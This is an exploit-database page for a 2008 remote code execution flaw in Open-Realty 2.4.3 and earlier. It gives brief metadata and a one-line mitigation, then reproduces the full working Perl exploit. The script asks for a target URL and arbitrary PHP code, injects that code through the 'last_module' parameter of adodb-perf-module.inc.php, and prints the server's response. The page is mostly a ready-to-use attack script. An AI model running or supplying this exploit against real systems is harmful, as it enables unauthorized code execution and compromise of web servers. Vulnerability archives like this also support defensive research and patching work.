Open-Realty - exploit.company

vendor:

Open-Realty

by:

Iron

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Open-Realty

Affected Version From: 2.4.2003

Affected Version To: 2.4.2003

Patch Exists: YES

Related CWE: N/A

CPE: a:open-realty:open-realty

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Open-Realty <= 2.4.3 Remote Code Execution exploit

This exploit allows an attacker to execute arbitrary code on a vulnerable Open-Realty version 2.4.3 or lower. The exploit requires the PHP configuration directive register_globals to be set to On. The exploit works by sending a crafted HTTP request to the vulnerable server, which includes the code to be executed. The code is then evaluated by the vulnerable server.

Mitigation:

Disable register_globals in the PHP configuration file, and upgrade to the latest version of Open-Realty.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#	Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
#							~Iron
#							http://www.randombase.com
require LWP::UserAgent;

print "#
# Open-Realty <= 2.4.3 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/openrealtydir/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
	$target = "http://".$target;
}
if($target !~ /\/$/)
{
	$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "include/class/adodb/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->get($target);

if ($response->is_success)
{
	print "\n"."#" x 20 ."\n";
	print $response->content;
	print "\n"."#" x 20 ."\n";
}
else
{
 die "Error: ".$response->status_line;
}

# milw0rm.com [2008-02-09]